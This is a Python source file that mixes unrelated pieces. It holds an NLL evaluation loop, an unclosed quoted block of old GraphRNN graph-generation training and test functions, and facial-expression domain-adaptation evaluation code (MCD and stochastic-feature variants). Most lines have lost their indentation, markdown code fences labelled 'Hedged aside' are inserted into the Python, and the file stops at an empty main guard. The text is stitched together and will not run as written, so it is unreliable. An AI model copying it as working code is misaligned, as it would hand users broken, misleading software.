for i in range(10):
print (i)
nlls_train, _ = rnn_data_nll(args, rnn, output, dataset_train)
print (np.mean(nlls_train))
#nll_test = rnn_data_nll(epoch, args, rnn, output, dataset_test)
# Plot the distribution of train NLLs
_, be = np.histogram(nlls_train, bins='auto')
plt.figure()
sns.distplot(nlls_train, kde=True)
plt.show()
#plt.savefig("Histogram.png")
print('NLL evaluation done')
#### OLD UNUSED CODE ####
'''
########### for graph completion task
def train_graph_completion(args, dataset_test, rnn, output):
fname = args.model_save_path + args.fname + 'lstm_' + str(args.load_epoch) + '.dat'
rnn.load_state_dict(torch.load(fname))
fname = args.model_save_path + args.fname + 'output_' + str(args.load_epoch) + '.dat'
output.load_state_dict(torch.load(fname))
epoch = args.load_epoch
print('model loaded!, epoch: {}'.format(args.load_epoch))
for sample_time in range(1,4):
if 'GraphRNN_MLP' in args.note:
G_pred = test_mlp_partial_simple_epoch(epoch, args, rnn, output, dataset_test,sample_time=sample_time)
if 'GraphRNN_VAE' in args.note:
G_pred = test_vae_partial_epoch(epoch, args, rnn, output, dataset_test,sample_time=sample_time)
# save graphs
fname = args.graph_save_path + args.fname_pred + str(epoch) +'_'+str(sample_time) + 'graph_completion.dat'
save_graph_list(G_pred, fname)
print('graph completion done, graphs saved')
# Not used and not important!
def train_rnn_forward_epoch(epoch, args, rnn, output, data_loader):
rnn.train()
output.train()
loss_sum = 0
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_unsorted = data['y'].float()
y_len_unsorted = data['len']
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
y_unsorted = y_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# output.hidden = output.init_hidden(batch_size=x_unsorted.size(0)*x_unsorted.size(1))
# sort input
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
y = torch.index_select(y_unsorted,0,sort_index)
# input, output for output rnn module
# a smart use of pytorch builtin function: pack variable--b1_l1,b2_l1,...,b1_l2,b2_l2,...
y_reshape = pack_padded_sequence(y,y_len,batch_first=True).data
# reverse y_reshape, so that their lengths are sorted, add dimension
idx = [i for i in range(y_reshape.size(0)-1, -1, -1)]
idx = torch.LongTensor(idx)
y_reshape = y_reshape.index_select(0, idx)
y_reshape = y_reshape.view(y_reshape.size(0),y_reshape.size(1),1)
output_x = torch.cat((torch.ones(y_reshape.size(0),1,1),y_reshape[:,0:-1,0:1]),dim=1)
output_y = y_reshape
# batch size for output module: sum(y_len)
output_y_len = []
output_y_len_bin = np.bincount(np.array(y_len))
for i in range(len(output_y_len_bin)-1,0,-1):
count_temp = np.sum(output_y_len_bin[i:]) # count how many y_len is above i
output_y_len.extend([min(i,y.size(2))]*count_temp) # put them in output_y_len; max value should not exceed y.size(2)
# pack into variable
x = Variable(x).to(device)
y = Variable(y).to(device)
output_x = Variable(output_x).to(device)
output_y = Variable(output_y).to(device)
# print(output_y_len)
# print('len',len(output_y_len))
# print('y',y.size())
# print('output_y',output_y.size())
# if using ground truth to train
h = rnn(x, pack=True, input_len=y_len)
h = pack_padded_sequence(h,y_len,batch_first=True).data # get packed hidden vector
# reverse h
idx = [i for i in range(h.size(0) - 1, -1, -1)]
idx = Variable(torch.LongTensor(idx)).to(device)
h = h.index_select(0, idx)
hidden_null = Variable(torch.zeros(args.num_layers-1, h.size(0), h.size(1))).to(device)
output.hidden = torch.cat((h.view(1,h.size(0),h.size(1)),hidden_null),dim=0) # num_layers, batch_size, hidden_size
y_pred = output(output_x, pack=True, input_len=output_y_len)
y_pred = F.sigmoid(y_pred)
# clean
y_pred = pack_padded_sequence(y_pred, output_y_len, batch_first=True)
y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
output_y = pack_padded_sequence(output_y,output_y_len,batch_first=True)
output_y = pad_packed_sequence(output_y,batch_first=True)[0]
# use cross entropy loss
loss = binary_cross_entropy_weight(y_pred, output_y)
if epoch % args.epochs_log==0 and batch_idx==0: # only output first batch's statistics
print('Epoch: {}/{}, train loss: {:.6f}, graph type: {}, num_layer: {}, hidden: {}'.format(
epoch, args.epochs,loss.data[0], args.graph_type, args.num_layers, args.hidden_size_rnn))
# logging
log_value('loss_'+args.fname, loss.data[0], epoch*args.batch_ratio+batch_idx)
# print(y_pred.size())
feature_dim = y_pred.size(0)*y_pred.size(1)
loss_sum += loss.data[0]*feature_dim/y.size(0)
return loss_sum/(batch_idx+1)
########### for NLL evaluation
def train_nll(args, dataset_train, dataset_test, rnn, output,graph_validate_len,graph_test_len, max_iter = 1000):
fname = args.model_save_path + args.fname + 'lstm_' + str(args.load_epoch) + '.dat'
rnn.load_state_dict(torch.load(fname))
fname = args.model_save_path + args.fname + 'output_' + str(args.load_epoch) + '.dat'
output.load_state_dict(torch.load(fname))
epoch = args.load_epoch
print('model loaded!, epoch: {}'.format(args.load_epoch))
fname_output = args.nll_save_path + args.note + '_' + args.graph_type + '.csv'
with open(fname_output, 'w+') as f:
f.write(str(graph_validate_len)+','+str(graph_test_len)+'\n')
f.write('train,test\n')
for iter in range(max_iter):
print(iter)
if 'GraphRNN_MLP' in args.note:
nll_train = train_mlp_forward_epoch(epoch, args, rnn, output, dataset_train)
nll_test = train_mlp_forward_epoch(epoch, args, rnn, output, dataset_test)
if 'GraphRNN_RNN' in args.note:
nll_train = train_rnn_forward_epoch(epoch, args, rnn, output, dataset_train)
nll_test = train_rnn_forward_epoch(epoch, args, rnn, output, dataset_test)
print('train',nll_train,'test',nll_test)
f.write(str(nll_train)+','+str(nll_test)+'\n')
print('NLL evaluation done')
def train_vae_epoch(epoch, args, rnn, output, data_loader,
optimizer_rnn, optimizer_output,
scheduler_rnn, scheduler_output):
rnn.train()
output.train()
loss_sum = 0
for batch_idx, data in enumerate(data_loader):
rnn.zero_grad()
output.zero_grad()
x_unsorted = data['x'].float()
y_unsorted = data['y'].float()
y_len_unsorted = data['len']
y_len_max = max(y_len_unsorted)
x_unsorted = x_unsorted[:, 0:y_len_max, :]
y_unsorted = y_unsorted[:, 0:y_len_max, :]
# initialize lstm hidden state according to batch size
rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))
# sort input
y_len,sort_index = torch.sort(y_len_unsorted,0,descending=True)
y_len = y_len.numpy().tolist()
x = torch.index_select(x_unsorted,0,sort_index)
y = torch.index_select(y_unsorted,0,sort_index)
x = Variable(x).to(device)
y = Variable(y).to(device)
# if using ground truth to train
h = rnn(x, pack=True, input_len=y_len)
y_pred,z_mu,z_lsgms = output(h)
y_pred = F.sigmoid(y_pred)
# clean
y_pred = pack_padded_sequence(y_pred, y_len, batch_first=True)
y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
z_mu = pack_padded_sequence(z_mu, y_len, batch_first=True)
z_mu = pad_packed_sequence(z_mu, batch_first=True)[0]
z_lsgms = pack_padded_sequence(z_lsgms, y_len, batch_first=True)
z_lsgms = pad_packed_sequence(z_lsgms, batch_first=True)[0]
# use cross entropy loss
loss_bce = binary_cross_entropy_weight(y_pred, y)
loss_kl = -0.5 * torch.sum(1 + z_lsgms - z_mu.pow(2) - z_lsgms.exp())
loss_kl /= y.size(0)*y.size(1)*sum(y_len) # normalize
loss = loss_bce + loss_kl
loss.backward()
# update deterministic and lstm
optimizer_output.step()
optimizer_rnn.step()
scheduler_output.step()
scheduler_rnn.step()
z_mu_mean = torch.mean(z_mu.data)
z_sgm_mean = torch.mean(z_lsgms.mul(0.5).exp_().data)
z_mu_min = torch.min(z_mu.data)
z_sgm_min = torch.min(z_lsgms.mul(0.5).exp_().data)
z_mu_max = torch.max(z_mu.data)
z_sgm_max = torch.max(z_lsgms.mul(0.5).exp_().data)
if epoch % args.epochs_log==0 and batch_idx==0: # only output first batch's statistics
print('Epoch: {}/{}, train bce loss: {:.6f}, train kl loss: {:.6f}, graph type: {}, num_layer: {}, hidden: {}'.format(
epoch, args.epochs,loss_bce.data[0], loss_kl.data[0], args.graph_type, args.num_layers, args.hidden_size_rnn))
print('z_mu_mean', z_mu_mean, 'z_mu_min', z_mu_min, 'z_mu_max', z_mu_max, 'z_sgm_mean', z_sgm_mean, 'z_sgm_min', z_sgm_min, 'z_sgm_max', z_sgm_max)
# logging
log_value('bce_loss_'+args.fname, loss_bce.data[0], epoch*args.batch_ratio+batch_idx)
log_value('kl_loss_' +args.fname, loss_kl.data[0], epoch*args.batch_ratio + batch_idx)
log_value('z_mu_mean_'+args.fname, z_mu_mean, epoch*args.batch_ratio + batch_idx)
log_value('z_mu_min_'+args.fname, z_mu_min, epoch*args.batch_ratio + batch_idx)
log_value('z_mu_max_'+args.fname, z_mu_max, epoch*args.batch_ratio + batch_idx)
log_value('z_sgm_mean_'+args.fname, z_sgm_mean, epoch*args.batch_ratio + batch_idx)
log_value('z_sgm_min_'+args.fname, z_sgm_min, epoch*args.batch_ratio + batch_idx)
log_value('z_sgm_max_'+args.fname, z_sgm_max, epoch*args.batch_ratio + batch_idx)
loss_sum += loss.data[0]
return loss_sum/(batch_idx+1)
def test_vae_epoch(epoch, args, rnn, output, test_batch_size=16, save_histogram=False, sample_time=1):
    rnn.hidden = rnn.init_hidden(test_batch_size)
    rnn.eval()
    output.eval()

    # generate graphs node by node
    max_num_node = int(args.max_num_node)
    y_pred = torch.zeros(test_batch_size, max_num_node, args.max_prev_node).to(device)  # normalized prediction scores
    y_pred_long = torch.zeros(test_batch_size, max_num_node, args.max_prev_node).to(device)  # discrete predictions
    x_step = torch.ones(test_batch_size, 1, args.max_prev_node).to(device)
    for i in range(max_num_node):
        h = rnn(x_step)
        y_pred_step, _, _ = output(h)
        y_pred[:, i:i + 1, :] = torch.sigmoid(y_pred_step)
        x_step = sample_sigmoid(y_pred_step, sample=True, sample_time=sample_time)
        y_pred_long[:, i:i + 1, :] = x_step
        rnn.hidden = rnn.hidden.detach()  # truncate history between generation steps
    y_pred_data = y_pred.detach()
    y_pred_long_data = y_pred_long.detach().long()

    # convert each predicted adjacency encoding into a graph
    G_pred_list = []
    for i in range(test_batch_size):
        adj_pred = decode_adj(y_pred_long_data[i].cpu().numpy())
        G_pred = get_graph(adj_pred)  # get a graph from the zero-padded adjacency matrix
        G_pred_list.append(G_pred)

    # save prediction histograms, plotting a histogram over each time step
    # if save_histogram:
    #     save_prediction_histogram(y_pred_data.cpu().numpy(),
    #                               fname_pred=args.figure_prediction_save_path + args.fname_pred + str(epoch) + '.jpg',
    #                               max_num_node=max_num_node)
    return G_pred_list
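# Hedged aside (illustrative only): `decode_adj` and `get_graph` live elsewhere in the
# repo. The sketch below shows the kind of banded encoding being inverted, assuming
# entry (i, j) of the encoded matrix marks an edge between node i+1 and node i-j; that
# matches the general GraphRNN scheme but not necessarily this repo's exact convention.

```python
def decode_adj_sketch(encoded):
    # rebuild a symmetric adjacency matrix from the banded per-node encoding
    n = len(encoded) + 1
    adj = [[0] * n for _ in range(n)]
    for i, row in enumerate(encoded):
        for j, bit in enumerate(row):
            prev = i - j  # node i+1 connects back j steps, to node i-j
            if bit and prev >= 0:
                adj[i + 1][prev] = adj[prev][i + 1] = 1
    return adj

# a 3-node triangle: node 1 links to node 0; node 2 links to nodes 1 and 0
triangle = decode_adj_sketch([[1, 0], [1, 1]])
print(triangle)  # [[0, 1, 1], [1, 0, 1], [1, 1, 0]]
```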
def test_vae_partial_epoch(epoch, args, rnn, output, data_loader, save_histogram=False, sample_time=1):
    rnn.eval()
    output.eval()
    G_pred_list = []
    for batch_idx, data in enumerate(data_loader):
        x = data['x'].float()
        y = data['y'].float()
        y_len = data['len']
        test_batch_size = x.size(0)
        rnn.hidden = rnn.init_hidden(test_batch_size)

        # generate graphs node by node
        max_num_node = int(args.max_num_node)
        y_pred = torch.zeros(test_batch_size, max_num_node, args.max_prev_node).to(device)  # normalized prediction scores
        y_pred_long = torch.zeros(test_batch_size, max_num_node, args.max_prev_node).to(device)  # discrete predictions
        x_step = torch.ones(test_batch_size, 1, args.max_prev_node).to(device)
        for i in range(max_num_node):
            print('generating node', i)
            h = rnn(x_step)
            y_pred_step, _, _ = output(h)
            y_pred[:, i:i + 1, :] = torch.sigmoid(y_pred_step)
            x_step = sample_sigmoid_supervised(y_pred_step, y[:, i:i + 1, :].to(device),
                                               current=i, y_len=y_len, sample_time=sample_time)
            y_pred_long[:, i:i + 1, :] = x_step
            rnn.hidden = rnn.hidden.detach()
        y_pred_long_data = y_pred_long.detach().long()

        # convert predictions to graphs
        for i in range(test_batch_size):
            adj_pred = decode_adj(y_pred_long_data[i].cpu().numpy())
            G_pred = get_graph(adj_pred)  # get a graph from the zero-padded adjacency matrix
            G_pred_list.append(G_pred)
    return G_pred_list
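# Hedged aside (illustrative only): the real `sample_sigmoid_supervised` handles a
# whole batch with per-graph lengths; a per-row sketch of the idea — copy ground truth
# while inside the observed prefix of the graph, sample beyond it — in pure Python.

```python
import random

def sample_supervised_sketch(pred_probs, truth_row, current, y_len, rng):
    # inside the observed prefix, copy the ground-truth adjacency row;
    # past it, draw each edge from the predicted probability
    if current < y_len:
        return list(truth_row)
    return [1 if rng.random() < p else 0 for p in pred_probs]

rng = random.Random(0)
print(sample_supervised_sketch([0.9, 0.2], [1, 0], current=0, y_len=2, rng=rng))  # [1, 0]
```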
def train_mlp_epoch(epoch, args, rnn, output, data_loader,
                    optimizer_rnn, optimizer_output,
                    scheduler_rnn, scheduler_output):
    rnn.train()
    output.train()
    loss_sum = 0
    for batch_idx, data in enumerate(data_loader):
        rnn.zero_grad()
        output.zero_grad()
        x_unsorted = data['x'].float()
        y_unsorted = data['y'].float()
        y_len_unsorted = data['len']
        y_len_max = max(y_len_unsorted)
        x_unsorted = x_unsorted[:, 0:y_len_max, :]
        y_unsorted = y_unsorted[:, 0:y_len_max, :]
        # initialize the lstm hidden state according to the batch size
        rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))

        # sort sequences by length (descending), as required for packing
        y_len, sort_index = torch.sort(y_len_unsorted, 0, descending=True)
        y_len = y_len.numpy().tolist()
        x = torch.index_select(x_unsorted, 0, sort_index).to(device)
        y = torch.index_select(y_unsorted, 0, sort_index).to(device)

        h = rnn(x, pack=True, input_len=y_len)
        y_pred = output(h)
        y_pred = torch.sigmoid(y_pred)
        # zero out predictions beyond each sequence's true length
        y_pred = pack_padded_sequence(y_pred, y_len, batch_first=True)
        y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]
        # binary cross-entropy loss over the adjacency-vector predictions
        loss = binary_cross_entropy_weight(y_pred, y)
        loss.backward()
        # update the output MLP and the lstm
        optimizer_output.step()
        optimizer_rnn.step()
        scheduler_output.step()
        scheduler_rnn.step()

        if epoch % args.epochs_log == 0 and batch_idx == 0:  # only log the first batch's statistics
            print('Epoch: {}/{}, train loss: {:.6f}, graph type: {}, num_layer: {}, hidden: {}'.format(
                epoch, args.epochs, loss.item(), args.graph_type, args.num_layers, args.hidden_size_rnn))

        # logging
        log_value('loss_' + args.fname, loss.item(), epoch * args.batch_ratio + batch_idx)
        loss_sum += loss.item()
    return loss_sum / (batch_idx + 1)
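# Hedged aside (illustrative only): `pack_padded_sequence` historically required the
# batch sorted by length in descending order, which is why the batch is reordered
# before packing. The index bookkeeping mirrored in pure Python:

```python
# lengths of three sequences in a batch, and aligned payloads
y_len_unsorted = [3, 5, 2]
x_unsorted = ['seq_a', 'seq_b', 'seq_c']

# argsort by length, descending (mirrors torch.sort(..., descending=True))
sort_index = sorted(range(len(y_len_unsorted)), key=lambda i: y_len_unsorted[i], reverse=True)
y_len = [y_len_unsorted[i] for i in sort_index]
x = [x_unsorted[i] for i in sort_index]  # mirrors torch.index_select(x_unsorted, 0, sort_index)
print(y_len, x)  # [5, 3, 2] ['seq_b', 'seq_a', 'seq_c']
```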
def test_mlp_epoch(epoch, args, rnn, output, test_batch_size=16, save_histogram=False, sample_time=1):
    rnn.hidden = rnn.init_hidden(test_batch_size)
    rnn.eval()
    output.eval()

    # generate graphs node by node
    max_num_node = int(args.max_num_node)
    y_pred = torch.zeros(test_batch_size, max_num_node, args.max_prev_node).to(device)  # normalized prediction scores
    y_pred_long = torch.zeros(test_batch_size, max_num_node, args.max_prev_node).to(device)  # discrete predictions
    x_step = torch.ones(test_batch_size, 1, args.max_prev_node).to(device)
    for i in range(max_num_node):
        h = rnn(x_step)
        y_pred_step = output(h)
        y_pred[:, i:i + 1, :] = torch.sigmoid(y_pred_step)
        x_step = sample_sigmoid(y_pred_step, sample=True, sample_time=sample_time)
        y_pred_long[:, i:i + 1, :] = x_step
        rnn.hidden = rnn.hidden.detach()  # truncate history between generation steps
    y_pred_data = y_pred.detach()
    y_pred_long_data = y_pred_long.detach().long()

    # convert each predicted adjacency encoding into a graph
    G_pred_list = []
    for i in range(test_batch_size):
        adj_pred = decode_adj(y_pred_long_data[i].cpu().numpy())
        G_pred = get_graph(adj_pred)  # get a graph from the zero-padded adjacency matrix
        G_pred_list.append(G_pred)

    # save prediction histograms, plotting a histogram over each time step
    # if save_histogram:
    #     save_prediction_histogram(y_pred_data.cpu().numpy(),
    #                               fname_pred=args.figure_prediction_save_path + args.fname_pred + str(epoch) + '.jpg',
    #                               max_num_node=max_num_node)
    return G_pred_list
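# Hedged aside (illustrative only): `sample_sigmoid` is defined elsewhere in the repo
# and additionally retries up to `sample_time` times to avoid all-zero rows; the core
# operation is one Bernoulli draw per predicted edge probability, sketched below.

```python
import random

def sample_sigmoid_sketch(probs, rng):
    # one Bernoulli draw per predicted edge probability
    return [1 if rng.random() < p else 0 for p in probs]

rng = random.Random(0)
draws = sample_sigmoid_sketch([0.9, 0.1, 0.5], rng)
print(draws)  # each entry is 0 or 1
```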
def test_mlp_partial_epoch(epoch, args, rnn, output, data_loader, save_histogram=False, sample_time=1):
    rnn.eval()
    output.eval()
    G_pred_list = []
    for batch_idx, data in enumerate(data_loader):
        x = data['x'].float()
        y = data['y'].float()
        y_len = data['len']
        test_batch_size = x.size(0)
        rnn.hidden = rnn.init_hidden(test_batch_size)

        # generate graphs node by node
        max_num_node = int(args.max_num_node)
        y_pred = torch.zeros(test_batch_size, max_num_node, args.max_prev_node).to(device)  # normalized prediction scores
        y_pred_long = torch.zeros(test_batch_size, max_num_node, args.max_prev_node).to(device)  # discrete predictions
        x_step = torch.ones(test_batch_size, 1, args.max_prev_node).to(device)
        for i in range(max_num_node):
            print('generating node', i)
            h = rnn(x_step)
            y_pred_step = output(h)
            y_pred[:, i:i + 1, :] = torch.sigmoid(y_pred_step)
            x_step = sample_sigmoid_supervised(y_pred_step, y[:, i:i + 1, :].to(device),
                                               current=i, y_len=y_len, sample_time=sample_time)
            y_pred_long[:, i:i + 1, :] = x_step
            rnn.hidden = rnn.hidden.detach()
        y_pred_long_data = y_pred_long.detach().long()

        # convert predictions to graphs
        for i in range(test_batch_size):
            adj_pred = decode_adj(y_pred_long_data[i].cpu().numpy())
            G_pred = get_graph(adj_pred)  # get a graph from the zero-padded adjacency matrix
            G_pred_list.append(G_pred)
    return G_pred_list
def test_mlp_partial_simple_epoch(epoch, args, rnn, output, data_loader, save_histogram=False, sample_time=1):
    rnn.eval()
    output.eval()
    G_pred_list = []
    for batch_idx, data in enumerate(data_loader):
        x = data['x'].float()
        y = data['y'].float()
        y_len = data['len']
        test_batch_size = x.size(0)
        rnn.hidden = rnn.init_hidden(test_batch_size)

        # generate graphs node by node
        max_num_node = int(args.max_num_node)
        y_pred = torch.zeros(test_batch_size, max_num_node, args.max_prev_node).to(device)  # normalized prediction scores
        y_pred_long = torch.zeros(test_batch_size, max_num_node, args.max_prev_node).to(device)  # discrete predictions
        x_step = torch.ones(test_batch_size, 1, args.max_prev_node).to(device)
        for i in range(max_num_node):
            print('generating node', i)
            h = rnn(x_step)
            y_pred_step = output(h)
            y_pred[:, i:i + 1, :] = torch.sigmoid(y_pred_step)
            x_step = sample_sigmoid_supervised_simple(y_pred_step, y[:, i:i + 1, :].to(device),
                                                      current=i, y_len=y_len, sample_time=sample_time)
            y_pred_long[:, i:i + 1, :] = x_step
            rnn.hidden = rnn.hidden.detach()
        y_pred_long_data = y_pred_long.detach().long()

        # convert predictions to graphs
        for i in range(test_batch_size):
            adj_pred = decode_adj(y_pred_long_data[i].cpu().numpy())
            G_pred = get_graph(adj_pred)  # get a graph from the zero-padded adjacency matrix
            G_pred_list.append(G_pred)
    return G_pred_list
def train_mlp_forward_epoch(epoch, args, rnn, output, data_loader):
    rnn.train()
    output.train()
    loss_sum = 0
    for batch_idx, data in enumerate(data_loader):
        rnn.zero_grad()
        output.zero_grad()
        x_unsorted = data['x'].float()
        y_unsorted = data['y'].float()
        y_len_unsorted = data['len']
        y_len_max = max(y_len_unsorted)
        x_unsorted = x_unsorted[:, 0:y_len_max, :]
        y_unsorted = y_unsorted[:, 0:y_len_max, :]
        # initialize the lstm hidden state according to the batch size
        rnn.hidden = rnn.init_hidden(batch_size=x_unsorted.size(0))

        # sort sequences by length (descending), as required for packing
        y_len, sort_index = torch.sort(y_len_unsorted, 0, descending=True)
        y_len = y_len.numpy().tolist()
        x = torch.index_select(x_unsorted, 0, sort_index).to(device)
        y = torch.index_select(y_unsorted, 0, sort_index).to(device)

        h = rnn(x, pack=True, input_len=y_len)
        y_pred = output(h)
        y_pred = torch.sigmoid(y_pred)
        # zero out predictions beyond each sequence's true length
        y_pred = pack_padded_sequence(y_pred, y_len, batch_first=True)
        y_pred = pad_packed_sequence(y_pred, batch_first=True)[0]

        # per-step cross-entropy, weighted by the number of valid entries at each step;
        # note this forward-only variant computes the loss without an optimizer update
        loss = 0
        for j in range(y.size(1)):
            end_idx = min(j + 1, y.size(2))  # step j has at most j+1 valid previous-node entries
            loss += binary_cross_entropy_weight(y_pred[:, j, 0:end_idx], y[:, j, 0:end_idx]) * end_idx

        if epoch % args.epochs_log == 0 and batch_idx == 0:  # only log the first batch's statistics
            print('Epoch: {}/{}, train loss: {:.6f}, graph type: {}, num_layer: {}, hidden: {}'.format(
                epoch, args.epochs, loss.item(), args.graph_type, args.num_layers, args.hidden_size_rnn))

        # logging
        log_value('loss_' + args.fname, loss.item(), epoch * args.batch_ratio + batch_idx)
        loss_sum += loss.item()
    return loss_sum / (batch_idx + 1)
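# Hedged aside (illustrative only): the `end_idx` weighting above reflects that, under
# a band encoding of width `max_prev_node`, generation step j carries at most
# min(j + 1, max_prev_node) valid previous-node entries.

```python
max_prev_node = 3
num_steps = 5
valid_widths = [min(j + 1, max_prev_node) for j in range(num_steps)]
print(valid_widths)  # [1, 2, 3, 3, 3]
```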
n_samples = 5
sigma_avg = 5
threshold = np.log(sigma_avg) + (1 + np.log(2 * np.pi)) / 2
def test_MCD(args, splits=None):
if splits is None: # evaluate on test splits by default
splits = ['test_source', 'test_target']
args.train_batch = 1
args.test_batch = 1
# Build Dataloader
print("Building Train and Test Dataloader...")
dataloaders = {'train_source': BuildDataloader(args, split='train', domain='source', max_samples=args.source_labeled),
'train_target': BuildDataloader(args, split='train', domain='target', max_samples=args.target_unlabeled),
'test_source': BuildDataloader(args, split='test', domain='source'),
'test_target': BuildDataloader(args, split='test', domain='target')}
print('Done!')
if args.use_mcd:
G = IR_global_local_feat(50)
# print(G)
G_ckpt = torch.load(os.path.join(args.out,'ckpts', 'MCD_G_26.pkl'))
G.load_state_dict(G_ckpt)
F1 = ResClassifier(num_classes=args.class_num, num_layer=1)
F1_ckpt = torch.load(os.path.join(args.out,'ckpts', 'MCD_F2_26.pkl'))
F1.load_state_dict(F1_ckpt)
G.cuda()
F1.cuda()
G.eval()
F1.eval()
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
Features = []
Labels = []
results = []
for split in splits:
out_img_dir=os.path.join(args.out, f'out_imgs_{split}')
wrong_imgs=os.path.join(args.out, f'misclassified_imgs_{split}')
os.makedirs(out_img_dir, exist_ok=True)
for exp in label2exp.values():
os.makedirs(os.path.join(out_img_dir, exp), exist_ok=True)
os.makedirs(os.path.join(wrong_imgs, exp), exist_ok=True)
print(f'\n[{split}]')
iter_dataloader = iter(dataloaders[split])
acc, prec, recall = [AverageMeter() for i in range(args.class_num)], \
[AverageMeter() for i in range(args.class_num)], \
[AverageMeter() for i in range(args.class_num)]
for batch_index, (input, landmark, label, img_name) in enumerate(iter_dataloader):
input, landmark, label = input.cuda(), landmark.cuda(), label
with torch.no_grad():
feature = G(input, landmark)
output = F1(feature)
            probs = (F.softmax(output, dim=1).cpu().data.numpy() * 100).astype(int)
max_prob = np.max(probs)
pred_class = np.argmax(probs)
pred= {'split':split, 'img':img_name[0], 'label':label2exp[label.cpu().data.numpy()[0]], 'pred':label2exp[pred_class]}
results.append(pred)
            if False:  # set to True to save annotated prediction images
img = input[0].cpu().data.numpy()
img = np.einsum('kij->ijk',img)
img = img * std + mean
img = np.clip(img, 0, 1) *255
img = img.astype(np.uint8)
out= f'prob:{max_prob} \n label: {label2exp[label.cpu().data.numpy()[0]]} pred:{label2exp[pred_class]}'
plt.imshow(img)
plt.title(out)
plt.savefig(os.path.join(out_img_dir,label2exp[label.cpu().data.numpy()[0]], f'{split}_{batch_index}.png'))
print(pred)
print('\n\n')
Compute_Accuracy(args, output, label, acc, prec, recall)
Features.append(feature.cpu().data.numpy())
Label = label.cpu().data.numpy()
if Label[0]!=pred_class:
plt.savefig(os.path.join(wrong_imgs,label2exp[label.cpu().data.numpy()[0]], f'{split}_{batch_index}.png'))
if split == 'test_target':
Label+=7
elif split == 'train_source':
Label+=14
Labels.append(Label)
AccuracyInfo, acc_avg, prec_avg, recall_avg, f1_avg = Show_Accuracy(acc, prec, recall, args.class_num)
df = pd.DataFrame.from_dict(results)
df.to_csv(os.path.join(out_img_dir,'results.csv'), index=False, header=True)
return
def test_stoch_MCD(args, splits=None):
if splits is None: # evaluate on test splits by default
splits = ['test_source', 'test_target']
args.train_batch = 1
args.test_batch = 1
# Build Dataloader
print("Building Train and Test Dataloader...")
dataloaders = {'train_source': BuildDataloader(args, split='train', domain='source', max_samples=args.source_labeled),
'train_target': BuildDataloader(args, split='train', domain='target', max_samples=args.target_unlabeled),
'test_source': BuildDataloader(args, split='test', domain='source'),
'test_target': BuildDataloader(args, split='test', domain='target')}
print('Done!')
G = IR_global_local_stoch_feat(50,feature_dim=384)
print(G)
G_ckpt = torch.load(os.path.join(args.out,'ckpts', 'Stoch_MCD_G.pkl'))
G.load_state_dict(G_ckpt)
G.cuda()
F1 = Stochastic_Features_cls(args, input_dim=G.output_num())
F1_ckpt = torch.load(os.path.join(args.out,'ckpts', 'Stoch_MCD_F2.pkl'))
F1.load_state_dict(F1_ckpt)
F1.cuda()
G.eval()
F1.eval()
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
Features = []
Labels = []
results = []
for split in splits:
out_img_dir=os.path.join(args.out, f'out_imgs_{split}')
wrong_imgs=os.path.join(args.out, f'misclassified_imgs_{split}')
os.makedirs(out_img_dir, exist_ok=True)
for exp in label2exp.values():
os.makedirs(os.path.join(out_img_dir, exp), exist_ok=True)
os.makedirs(os.path.join(wrong_imgs, exp), exist_ok=True)
print(f'\n[{split}]')
iter_dataloader = iter(dataloaders[split])
acc, prec, recall = [AverageMeter() for i in range(args.class_num)], \
[AverageMeter() for i in range(args.class_num)], \
[AverageMeter() for i in range(args.class_num)]
for batch_index, (input, landmark, label) in enumerate(iter_dataloader):
input, landmark, label = input.cuda(), landmark.cuda(), label
with torch.no_grad():
feature, sigma = G(input, landmark)
output = F1(feature)
            probs = (F.softmax(output, dim=1).cpu().data.numpy() * 100).astype(int)
max_prob = np.max(probs)
pred_class = np.argmax(probs)
mvn = MultivariateNormal(feature, scale_tril=torch.diag_embed(sigma))
loss_fu = torch.mean(nn.ReLU()(threshold - mvn.entropy()/G.output_num()))
entropy = mvn.entropy().cpu().data.numpy()[0]/G.output_num()
pred_entropy = 0
for i in range(n_samples):
feat = mvn.rsample()
output_sample = F1(feat)
                probs_samples = F.softmax(output_sample, dim=1)
pred_entropy += -torch.sum(probs_samples * torch.log(probs_samples))
print((probs_samples.cpu().data.numpy()*100).astype(int))
pred_entropy/=n_samples
pred= {'split':split, 'img':batch_index, 'label':label2exp[label.cpu().data.numpy()[0]], 'pred':label2exp[pred_class],
'entropy': f'{entropy:.3f}', 'prob': f'{max_prob}', 'pred entropy': f'{pred_entropy:5f}'}
results.append(pred)
if True:
img = input[0].cpu().data.numpy()
img = np.einsum('kij->ijk',img)
img = img * std + mean
img = np.clip(img, 0, 1) *255
img = img.astype(np.uint8)
out= f'feat_ent: {entropy:.3f} pred_ent: {pred_entropy:.3f} prob:{max_prob} \n label: {label2exp[label.cpu().data.numpy()[0]]} pred:{label2exp[pred_class]}'
plt.imshow(img)
plt.title(out)
plt.savefig(os.path.join(out_img_dir,label2exp[label.cpu().data.numpy()[0]], f'{split}_{batch_index}.png'))
print(pred, entropy, pred_entropy)
print('\n\n')
Compute_Accuracy(args, output, label, acc, prec, recall)
Features.append(feature.cpu().data.numpy())
Label = label.cpu().data.numpy()
if Label[0]!=pred_class:
plt.savefig(os.path.join(wrong_imgs,label2exp[label.cpu().data.numpy()[0]], f'{split}_{batch_index}.png'))
if split == 'test_target':
Label+=7
elif split == 'train_source':
Label+=14
Labels.append(Label)
AccuracyInfo, acc_avg, prec_avg, recall_avg, f1_avg = Show_Accuracy(acc, prec, recall, args.class_num)
df = pd.DataFrame.from_dict(results)
df.to_csv(os.path.join(out_img_dir,'results.csv'), index=False, header=True)
return
def main():
if args.use_mcd:
test_MCD(args, splits = ['train_target'])
if args.use_stoch_feats:
test_stoch_MCD(args, splits = ['test_target'])
return
if __name__ == '__main__':
